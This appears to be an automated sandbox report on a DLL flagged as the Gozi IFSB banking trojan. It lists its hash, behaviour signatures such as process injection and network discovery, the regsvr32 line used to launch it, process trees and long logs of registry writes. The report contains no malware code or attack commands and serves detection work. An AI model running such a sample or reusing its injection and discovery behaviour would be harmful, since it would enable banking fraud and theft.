Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-lgswrahfd2
Target 62ea3f935563b.dll
SHA256 982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203

Threat Level: Known bad

The file 62ea3f935563b.dll was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Gathers system information

Discovers systems in the same network

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 09:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-03 09:30

Reported

2022-08-03 09:33

Platform

win7-20220715-en

Max time kernel

53s

Max time network

48s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1940 wrote to memory of 1296 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Network

N/A

Files

memory/1940-54-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

memory/1296-55-0x0000000000000000-mapping.dmp

memory/1296-56-0x00000000762A1000-0x00000000762A3000-memory.dmp

memory/1296-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1296-62-0x00000000001E0000-0x00000000001ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-03 09:30

Reported

2022-08-03 09:33

Platform

win10v2004-20220721-en

Max time kernel

150s

Max time network

150s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4384 set thread context of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2648 set thread context of 3444 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 set thread context of 3788 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 set thread context of 4408 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 set thread context of 5096 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2648 set thread context of 5000 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = (binary data elided) C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = (binary data elided) C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- = 61e70bb92ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\add4030fae0a96ceed0ed5039e46b6296e894fb2f988c98e4e9808b37b6bc5e2" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- = (binary data elided) C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3adca56c5abdcdb858510c61faa733008065d521ca4a91ca9d66e6d6b0a95b3c" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a05ddd36a35d41d8407134ded41b831916b63e04ccbdc3de114173546de66693" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\323e5136-11f4-4ce9- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\37a5dc662a21e2e4f39235304b188e73bc2e198a60d3cbaa712dc378bc941121" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a1317e397a73f48d1de371fef0efeae40e59a0d44ff695bd001dad9030768756" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\add4030fae0a96ceed0ed5039e46b6296e894fb2f988c98e4e9808b37b6bc5e2" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = (binary data elided) C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\37a5dc662a21e2e4f39235304b188e73bc2e198a60d3cbaa712dc378bc941121" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = (binary data elided) C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d3535f7-b45f-4e2b- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\fe62587e9b241d80c98ec9c7d672f1c986d9ec5980d91198bb71e91272d3d3cc" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = 89f7dbb82ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4fbddba7-5cb2-42b6- = 2c6f06ba2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4cf88311-6fdd-4d3b- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69a3c2e2-768b-4fa4- = 153bf3b82ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67e3704f-6c17-41eb- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84484181-4d51-4a9a- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- = 4977f7b92ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\662b2298-f70d-4172- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\fe62587e9b241d80c98ec9c7d672f1c986d9ec5980d91198bb71e91272d3d3cc" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e02ef476-262e-4b5a- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa81ba26-2b77-4c42- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a05ddd36a35d41d8407134ded41b831916b63e04ccbdc3de114173546de66693" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6b80ac69-96fc-4319- = 442216b92ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5072bc72-5364-4bd5- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\815e2288-3362-42d5- C:\Windows\System32\RuntimeBroker.exe N/A
